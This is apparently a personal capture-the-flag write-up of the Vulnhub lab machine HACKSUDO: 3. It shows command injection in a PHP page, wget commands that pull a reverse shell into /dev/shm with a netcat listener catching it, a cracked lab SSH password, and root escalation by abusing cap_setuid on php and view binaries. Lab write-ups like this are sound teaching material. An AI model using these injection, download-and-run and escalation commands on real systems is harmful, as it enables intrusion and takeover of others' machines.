Vulnhub: HACKSUDO: 3
This is HACKSUDO: 3 from Vulnhub. It says:
This box should be easy . This machine was created for the InfoSec Prep Discord Server (, and
Find the user.txt and root.txt flag submit it to the mybox channel on Discord and get chance to get hacksudo machine hacking course free
I don’t normally post these anywhere but hey, maybe I will this time.
LOL. The first time I scanned this I only had a web port (HTTP on 80). After I completed it I scanned it again and SSH was open. Whaaaaaat? I don’t think I opened it; maybe I was too quick on the scan. Whatever, we start with web.
The website has a few things on it; it mostly presents as a copy of a github project but some enumeration reveals javascript files related to games and a few PHP files including info.php, login.php and generator.php. We don’t have any credentials so I ignore login.php; I run a bunch of feroxbuster scans but I don’t find anything interesting.
This is a page that allows you to enter a name, which it then renders in ASCII art. Neat. It is also command injectable; eg:
name && id
Which produces:
‘name’ as ASCII art, and
uid=33(www-data) gid=33(www-data) groups=33(www-data)
I try a few one-liner reverse shells but I can’t get one to fire. I try using echo to write a file on the webserver; the file gets created but it’s empty. I try with printf; same thing. Next I try using curl and wget to retrieve a shell from my box, eg (this is from Burp Suite):
ip=id && wget -O /var/www/html/cmd.php&submit=submit
This will create the file, but it’s empty, so no bueno. I try again but placing the file in the /tmp directory; still empty. I try /dev/shm - success! The sequence is:
Upload the file (this was just a bash reverse shell):
ip=id && wget -O /dev/shm/
Now make it executable:
ip=id && chmod x /dev/shm/
And now call it:
ip=id && /dev/shm/
And in my listener:
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 40924
bash: cannot set terminal process group (735): Inappropriate ioctl for device
bash: no job control in this shell
I have a look in the webserver; turns out my feroxbuster searches found most of the content. I check login.php and find this line:
you have logged in successfully , 0x Open The Next Door key is = GMYTGMBTGAZTAMZRGIYDGMJTGAZTAMZQGMZDEMBTGEZTAMZQGMYDGMY=
But even now I’ve rooted the box I’m still not sure what that means.
One level up in /var/www, we find this:
www-data@hacksudo:/var/www$ ls -alsh
ls -alsh
total 16K
4.0K drwxr-xr-x 3 www-data www-data 4.0K Apr 15 12:13 .
4.0K drwxr-xr-x 14 root root 4.0K Mar 19 07:57 ..
0 -rw-r--r-- 1 www-data www-data 0 Apr 15 12:13 .wget-hsts
4.0K -rwxrwxr-- 1 www-data www-data 176 Mar 20 11:31 hacksudo
4.0K drwxr-xr-x 6 www-data www-data 4.0K Apr 15 12:18 html
www-data@hacksudo:/var/www$ file hacksudo
file hacksudo
hacksudo: ASCII text
I won’t reproduce it here, but we have a ROT13 encoded file, which contains SSH credentials for hacksudo (the password is hashed, but John deals with it).
But, we had no open SSH port? What about internally? Yes. I couldn’t get it to work with the normal commands but using IPv6 it was ok, not sure if that was intentional or not.
www-data@hacksudo:/var/www$ ssh -6 hacksudo@localhost
ssh -6 hacksudo@localhost
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:DQGgjBAkTgrLHL8x9i2t/g6vbx0ASKgtWdGRHLbrXrU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
hacksudo@localhost's password: vishal
Welcome to Ubuntu 20.10 (GNU/Linux 5.8.0-45-generic x86_64)
* Documentation:
* Management:
* Support:
System information as of Thu Apr 15 12:24:32 PM UTC 2021
System load: 0.0 Processes: 120
Usage of /: 94.9% of 6.82GB Users logged in: 0
Memory usage: 41% IPv4 address for enp0s3:
Swap usage: 0%
=> / is using 94.9% of 6.82GB
* Introducing self-healing high availability clusters in MicroK8s.
Simple, hardened, Kubernetes for production, from RaspberryPi to DC.
45 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Mar 24 09:02:25 2021 from
hacksudo@hacksudo:~$ sudo -l
sudo -l
[sudo] password for hacksudo: vishal
Sorry, user hacksudo may not run sudo on hacksudo.
There are multiple ways of escalating to root on this box and I know that because after I’d done this, I watched a YouTube video of someone else doing the box and he used the LXD privesc which was much more complicated than what I did.
Linpeas points this out:
Files with capabilities:
/home/hacksudo/locker/php cap_setuid=ep
/home/hacksudo/locker/php cap_setuid=ep is writable
And GTFOBins lights the way:
hacksudo@hacksudo:~/locker$ CMD="/bin/sh"
hacksudo@hacksudo:~/locker$ ./php -r "posix_setuid(0); system('$CMD');"
./php -r "posix_setuid(0); system('$CMD');"
uid=0(root) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
Thu Apr 15 12:32:37 PM UTC 2021
cat root.txt
cat proof.txt
you successfully rooted hacksudo3 box !!!
Since I knew there was at least one other method for getting root, I went to look to see if I could find another one. I noticed linpeas pointed out that view also had the cap_setuid capability. Would that work - we have a method at GTFObins?
Yes, it does work - with a slight modification. Note; there are several different view binaries on the box. We want this one:
/home/hacksudo/view cap_setuid=ep
Trying it directly (more or less) from GTFObins:
hacksudo@hacksudo:~$ ./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
provokes this error:
reset: unknown terminal type unknown
In order to fix this, I changed a few things. Firstly, SSH with -t (this may not have been necessary):
www-data@hacksudo:/var/www/html$ ssh -6 -t hacksudo@localhost
Next, check (and then set) TERM:
hacksudo@hacksudo:~$ echo $TERM
echo $TERM
hacksudo@hacksudo:~$ export TERM=xterm-256color
export TERM=xterm-256color
hacksudo@hacksudo:~$ echo $TERM
echo $TERM
And finally:
hacksudo@hacksudo:~$ ./view -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
# id;hostname;date
uid=0(root) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
Thu Apr 15 01:21:40 PM UTC 2021
So; two ways to root and both different to the video I watched.